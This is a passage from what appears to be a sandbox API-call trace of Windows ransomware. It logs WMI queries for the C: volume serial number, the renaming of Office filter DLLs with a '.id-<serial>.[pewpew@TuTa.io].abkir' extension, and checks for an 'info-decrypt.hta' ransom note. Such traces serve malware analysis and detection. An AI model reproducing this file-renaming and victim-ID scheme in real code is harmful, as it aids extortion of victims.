ppvObject=0x6d8e7e8*=0x0) returned 0x80004002 [0184.761] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6027860, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e7fc | out: ppvObject=0x6d8e7fc*=0x6031270) returned 0x0 [0184.761] WbemDefPath:IUnknown:Release (This=0x6027860) returned 0x0 [0184.761] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031270, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e41c | out: ppvObject=0x6d8e41c*=0x6031270) returned 0x0 [0184.761] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031270, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6d8e3d8 | out: ppvObject=0x6d8e3d8*=0x0) returned 0x80004002 [0184.761] WbemDefPath:IUnknown:AddRef (This=0x6031270) returned 0x3 [0184.761] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031270, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6d8dd34 | out: ppvObject=0x6d8dd34*=0x0) returned 0x80004002 [0184.761] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031270, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6d8dce4 | out: ppvObject=0x6d8dce4*=0x0) returned 0x80004002 [0184.761] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031270, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8dcf0 | out: ppvObject=0x6d8dcf0*=0x66ce3c8) returned 0x0 [0184.761] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x66ce3c8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6d8dcf8 | out: pCid=0x6d8dcf8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0184.762] WbemDefPath:IUnknown:Release (This=0x66ce3c8) returned 0x3 [0184.762] CoGetContextToken (in: pToken=0x6d8dd50 | out: pToken=0x6d8dd50) returned 0x0 [0184.762] CoGetContextToken (in: pToken=0x6d8dd00 | out: pToken=0x6d8dd00) returned 0x0 [0184.762] CoGetContextToken (in: pToken=0x6d8e158 | out: pToken=0x6d8e158) returned 0x0 [0184.762] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031270, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e1e8 | out: ppvObject=0x6d8e1e8*=0x0) returned 0x80004002 [0184.762] WbemDefPath:IUnknown:Release (This=0x6031270) returned 0x2 [0184.762] WbemDefPath:IUnknown:Release (This=0x6031270) returned 0x1 [0184.762] CoGetContextToken (in: pToken=0x6d8eae0 | out: pToken=0x6d8eae0) returned 0x0 [0184.762] CoGetContextToken (in: pToken=0x6d8ea40 | out: pToken=0x6d8ea40) returned 0x0 [0184.762] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031270, riid=0x6d8eb10*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6d8eb0c | out: ppvObject=0x6d8eb0c*=0x6031270) returned 0x0 [0184.762] WbemDefPath:IUnknown:AddRef (This=0x6031270) returned 0x3 [0184.762] WbemDefPath:IUnknown:Release (This=0x6031270) returned 0x2 [0184.762] WbemDefPath:IWbemPath:SetText (This=0x6031270, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0184.762] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6031270, puCount=0x6d8ec90 | out: puCount=0x6d8ec90*=0x2) returned 0x0 [0184.762] WbemDefPath:IWbemPath:GetText (in: This=0x6031270, lFlags=4, puBuffLength=0x6d8ec8c*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ec8c*=0xf, pszText=0x0) returned 0x0 [0184.763] WbemDefPath:IWbemPath:GetText (in: This=0x6031270, lFlags=4, puBuffLength=0x6d8ec8c*=0xf, pszText="00000000000000" | out: puBuffLength=0x6d8ec8c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0184.763] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6d8ec90 | out: ppv=0x6d8ec90*=0xb51e34) returned 0x0 [0184.763] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6d8ec88 | out: pAptType=0x6d8ec88*=1) returned 0x0 [0184.763] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6d8ec8c | out: ppvObject=0x6d8ec8c*=0x0) returned 0x80004002 [0184.763] IUnknown:Release (This=0xb51e34) returned 0x1 [0184.764] CoGetClassObject (in: rclsid=0xb59574*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6d8e8b0 | out: ppv=0x6d8e8b0*=0x601f4c8) returned 0x0 [0184.764] WbemLocator:IUnknown:QueryInterface (in: This=0x601f4c8, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6d8eac8 | out: ppvObject=0x6d8eac8*=0x0) returned 0x80004002 [0184.764] WbemLocator:IClassFactory:CreateInstance (in: This=0x601f4c8, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8eadc | out: ppvObject=0x6d8eadc*=0x6027870) returned 0x0 [0184.764] WbemLocator:IUnknown:Release (This=0x601f4c8) returned 0x0 [0184.764] WbemLocator:IUnknown:QueryInterface (in: This=0x6027870, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e6fc | out: ppvObject=0x6d8e6fc*=0x6027870) returned 0x0 [0184.764] WbemLocator:IUnknown:QueryInterface (in: This=0x6027870, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6d8e6b8 | out: ppvObject=0x6d8e6b8*=0x0) returned 0x80004002 [0184.764] WbemLocator:IUnknown:AddRef (This=0x6027870) returned 0x3 [0184.764] WbemLocator:IUnknown:QueryInterface (in: This=0x6027870, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6d8e014 | out: ppvObject=0x6d8e014*=0x0) returned 0x80004002 [0184.764] WbemLocator:IUnknown:QueryInterface (in: This=0x6027870, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6d8dfc4 | out: ppvObject=0x6d8dfc4*=0x0) returned 0x80004002 [0184.764] WbemLocator:IUnknown:QueryInterface (in: This=0x6027870, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8dfd0 | out: ppvObject=0x6d8dfd0*=0x0) returned 0x80004002 [0184.764] CoGetContextToken (in: pToken=0x6d8e030 | out: pToken=0x6d8e030) returned 0x0 [0184.765] CoGetContextToken (in: pToken=0x6d8dfe0 | out: pToken=0x6d8dfe0) returned 0x0 [0184.765] CoGetContextToken (in: pToken=0x6d8e438 | out: pToken=0x6d8e438) returned 0x0 [0184.765] WbemLocator:IUnknown:QueryInterface (in: This=0x6027870, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e4c8 | out: ppvObject=0x6d8e4c8*=0x0) returned 0x80004002 [0184.765] WbemLocator:IUnknown:Release (This=0x6027870) returned 0x2 [0184.765] WbemLocator:IUnknown:Release (This=0x6027870) returned 0x1 [0184.765] CoGetContextToken (in: pToken=0x6d8eaa8 | out: pToken=0x6d8eaa8) returned 0x0 [0184.765] CoGetContextToken (in: pToken=0x6d8ea08 | out: pToken=0x6d8ea08) returned 0x0 [0184.765] WbemLocator:IUnknown:QueryInterface (in: This=0x6027870, riid=0x6d8ead8*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x6d8ead4 | out: ppvObject=0x6d8ead4*=0x6027870) returned 0x0 [0184.765] WbemLocator:IUnknown:AddRef (This=0x6027870) returned 0x3 [0184.765] WbemLocator:IUnknown:Release (This=0x6027870) returned 0x2 [0184.765] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6031270, puCount=0x6d8ec6c | out: puCount=0x6d8ec6c*=0x2) returned 0x0 [0184.765] WbemDefPath:IWbemPath:GetText (in: This=0x6031270, lFlags=8, puBuffLength=0x6d8ec68*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ec68*=0xf, pszText=0x0) returned 0x0 [0184.765] WbemDefPath:IWbemPath:GetText (in: This=0x6031270, lFlags=8, puBuffLength=0x6d8ec68*=0xf, pszText="00000000000000" | out: puBuffLength=0x6d8ec68*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0184.766] CoCreateInstance (in: rclsid=0x749b1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x749b12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x6d8eb44 | out: ppv=0x6d8eb44*=0x6027880) returned 0x0 [0184.766] WbemLocator:IWbemLocator:ConnectServer (in: This=0x6027880, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x6d8ebd8 | out: ppNamespace=0x6d8ebd8*=0x60330b4) returned 0x0 [0185.450] WbemLocator:IUnknown:QueryInterface (in: This=0x60330b4, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8ea74 | out: ppvObject=0x6d8ea74*=0xb5b314) returned 0x0 [0185.451] WbemLocator:IClientSecurity:QueryBlanket (in: This=0xb5b314, pProxy=0x60330b4, pAuthnSvc=0x6d8eac4, pAuthzSvc=0x6d8eac0, pServerPrincName=0x6d8eab8, pAuthnLevel=0x6d8eabc, pImpLevel=0x6d8eaac, pAuthInfo=0x6d8eab0, pCapabilites=0x6d8eab4 | out: pAuthnSvc=0x6d8eac4*=0xa, pAuthzSvc=0x6d8eac0*=0x0, pServerPrincName=0x6d8eab8, pAuthnLevel=0x6d8eabc*=0x6, pImpLevel=0x6d8eaac*=0x2, pAuthInfo=0x6d8eab0, pCapabilites=0x6d8eab4*=0x1) returned 0x0 [0185.451] WbemLocator:IUnknown:Release (This=0xb5b314) returned 0x1 [0185.451] WbemLocator:IUnknown:QueryInterface (in: This=0x60330b4, riid=0x749b10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8ea68 | out: ppvObject=0x6d8ea68*=0xb5b334) returned 0x0 [0185.451] WbemLocator:IUnknown:QueryInterface (in: This=0x60330b4, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8ea64 | out: ppvObject=0x6d8ea64*=0xb5b314) returned 0x0 [0185.451] WbemLocator:IClientSecurity:SetBlanket (This=0xb5b314, pProxy=0x60330b4, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0185.451] WbemLocator:IUnknown:Release (This=0xb5b314) returned 0x2 [0185.451] WbemLocator:IUnknown:Release (This=0xb5b334) returned 0x1 [0185.451] CoTaskMemFree (pv=0xbd4a68) [0185.451] WbemLocator:IUnknown:Release (This=0x6027880) returned 0x0 [0185.451] WbemLocator:IUnknown:QueryInterface (in: This=0x60330b4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e664 | out: ppvObject=0x6d8e664*=0xb5b334) returned 0x0 [0185.452] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b334, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6d8e620 | out: ppvObject=0x6d8e620*=0x0) returned 0x80004002 [0185.459] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b334, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6d8e43c | out: ppvObject=0x6d8e43c*=0x0) returned 0x80004002 [0185.486] WbemLocator:IUnknown:AddRef (This=0xb5b334) returned 0x3 [0185.486] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b334, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6d8df7c | out: ppvObject=0x6d8df7c*=0x0) returned 0x80004002 [0185.487] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b334, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6d8df2c | out: ppvObject=0x6d8df2c*=0x0) returned 0x80004002 [0185.487] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b334, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8df38 | out: ppvObject=0x6d8df38*=0xb5b294) returned 0x0 [0185.487] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0xb5b294, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6d8df40 | out: pCid=0x6d8df40*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0185.488] WbemLocator:IUnknown:Release (This=0xb5b294) returned 0x3 [0185.488] CoGetContextToken (in: pToken=0x6d8df98 | out: pToken=0x6d8df98) returned 0x0 [0185.488] CoGetContextToken (in: pToken=0x6d8e3a0 | out: pToken=0x6d8e3a0) returned 0x0 [0185.488] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b334, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e430 | out: ppvObject=0x6d8e430*=0xb5b31c) returned 0x0 [0185.488] WbemLocator:IRpcOptions:Query (in: This=0xb5b31c, pPrx=0xb5b334, dwProperty=2, pdwValue=0x6d8e458 | out: pdwValue=0x6d8e458) returned 0x80004002 [0185.488] WbemLocator:IUnknown:Release (This=0xb5b31c) returned 0x3 [0185.488] WbemLocator:IUnknown:Release (This=0xb5b334) returned 0x2 [0185.488] CoGetContextToken (in: pToken=0x6d8e978 | out: pToken=0x6d8e978) returned 0x0 [0185.488] CoGetContextToken (in: pToken=0x6d8e8d8 | out: pToken=0x6d8e8d8) returned 0x0 [0185.488] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b334, riid=0x6d8e9a8*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x6d8e9a4 | out: ppvObject=0x6d8e9a4*=0x60330b4) returned 0x0 [0185.488] WbemLocator:IUnknown:AddRef (This=0x60330b4) returned 0x4 [0185.488] WbemLocator:IUnknown:Release (This=0x60330b4) returned 0x3 [0185.488] WbemLocator:IUnknown:Release (This=0x60330b4) returned 0x2 [0185.488] SysStringLen (param_1=0x0) returned 0x0 [0185.488] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6031200, puCount=0x6d8ed3c | out: puCount=0x6d8ed3c*=0x0) returned 0x0 [0185.488] WbemDefPath:IWbemPath:GetText (in: This=0x6031200, lFlags=2, puBuffLength=0x6d8ed38*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ed38*=0x20, pszText=0x0) returned 0x0 [0185.488] WbemDefPath:IWbemPath:GetText (in: This=0x6031200, lFlags=2, puBuffLength=0x6d8ed38*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6d8ed38*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0185.489] CoGetContextToken (in: pToken=0x6d8e9a8 | out: pToken=0x6d8e9a8) returned 0x0 [0185.489] WbemLocator:IUnknown:AddRef (This=0xb5b334) returned 0x3 [0185.489] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b334, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e83c | out: ppvObject=0x6d8e83c*=0xb5b334) returned 0x0 [0185.489] WbemLocator:IUnknown:Release (This=0xb5b334) returned 0x3 [0185.489] WbemLocator:IUnknown:Release (This=0xb5b334) returned 0x2 [0185.489] WbemDefPath:IWbemPath:GetText (in: This=0x6031200, lFlags=2, puBuffLength=0x6d8ed40*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ed40*=0x20, pszText=0x0) returned 0x0 [0185.489] WbemDefPath:IWbemPath:GetText (in: This=0x6031200, lFlags=2, puBuffLength=0x6d8ed40*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6d8ed40*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0185.489] IWbemServices:GetObject (in: This=0x60330b4, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x6d8ecf4*=0x0, ppCallResult=0x0 | out: ppObject=0x6d8ecf4*=0x6028978, ppCallResult=0x0) returned 0x0 [0186.024] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6031270, puCount=0x6d8ecf4 | out: puCount=0x6d8ecf4*=0x2) returned 0x0 [0186.024] WbemDefPath:IWbemPath:GetText (in: This=0x6031270, lFlags=4, puBuffLength=0x6d8ecf0*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ecf0*=0xf, pszText=0x0) returned 0x0 [0186.024] WbemDefPath:IWbemPath:GetText (in: This=0x6031270, lFlags=4, puBuffLength=0x6d8ecf0*=0xf, pszText="00000000000000" | out: puBuffLength=0x6d8ecf0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0186.025] IWbemClassObject:Get (in: This=0x6028978, wszName="VolumeSerialNumber", lFlags=0, pVal=0x6d8ecf0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x37d233c*=0, plFlavor=0x37d2340*=0 | out: pVal=0x6d8ecf0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x37d233c*=8, plFlavor=0x37d2340*=0) returned 0x0 [0186.025] SysStringByteLen (bstr="9C354B42") returned 0x10 [0186.025] SysStringByteLen (bstr="9C354B42") returned 0x10 [0186.025] IWbemClassObject:Get (in: This=0x6028978, wszName="VolumeSerialNumber", lFlags=0, pVal=0x6d8ecf8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x37d233c*=8, plFlavor=0x37d2340*=0 | out: pVal=0x6d8ecf8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x37d233c*=8, plFlavor=0x37d2340*=0) returned 0x0 [0186.025] SysStringByteLen (bstr="9C354B42") returned 0x10 [0186.025] SysStringByteLen (bstr="9C354B42") returned 0x10 [0186.025] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll", nBufferLength=0x105, lpBuffer=0x6d8e8f8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll", lpFilePart=0x0) returned 0x42 [0186.025] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll.id-9C354B42.[pewpew@TuTa.io].abkir", nBufferLength=0x105, lpBuffer=0x6d8e8f8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll.id-9C354B42.[pewpew@TuTa.io].abkir", lpFilePart=0x0) returned 0x65 [0186.025] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ed58) returned 1 [0186.025] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\odffilt.dll"), fInfoLevelId=0x0, lpFileInformation=0x6d8edd4 | out: lpFileInformation=0x6d8edd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e922100, ftCreationTime.dwHighDateTime=0x1caafc8, ftLastAccessTime.dwLowDateTime=0x6b29d7d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x285b2000, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x20)) returned 1 [0186.025] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ed54) returned 1 [0186.025] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\odffilt.dll"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll.id-9C354B42.[pewpew@TuTa.io].abkir" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\odffilt.dll.id-9c354b42.[pewpew@tuta.io].abkir")) returned 1 [0186.064] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll", nBufferLength=0x105, lpBuffer=0x6d8e910, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll", lpFilePart=0x0) returned 0x43 [0186.064] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6d8e918, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\info-decrypt.hta", lpFilePart=0x0) returned 0x47 [0186.064] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ed78) returned 1 [0186.064] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\info-decrypt.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x6d8edf4 | out: lpFileInformation=0x6d8edf4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24ecc4a0, ftCreationTime.dwHighDateTime=0x1d68bad, ftLastAccessTime.dwLowDateTime=0x24ecc4a0, ftLastAccessTime.dwHighDateTime=0x1d68bad, ftLastWriteTime.dwLowDateTime=0x24ecc4a0, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x155e)) returned 1 [0186.064] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ed74) returned 1 [0186.064] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll", nBufferLength=0x105, lpBuffer=0x6d8e918, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll", lpFilePart=0x0) returned 0x43 [0186.064] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8edc4) returned 1 [0186.064] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\offfiltx.dll"), fInfoLevelId=0x0, lpFileInformation=0x37d2944 | out: lpFileInformation=0x37d2944*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e922100, ftCreationTime.dwHighDateTime=0x1caafc8, ftLastAccessTime.dwLowDateTime=0x596c1850, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x4e922100, ftLastWriteTime.dwHighDateTime=0x1caafc8, nFileSizeHigh=0x0, nFileSizeLow=0x16af90)) returned 1 [0186.313] SetThreadErrorMode 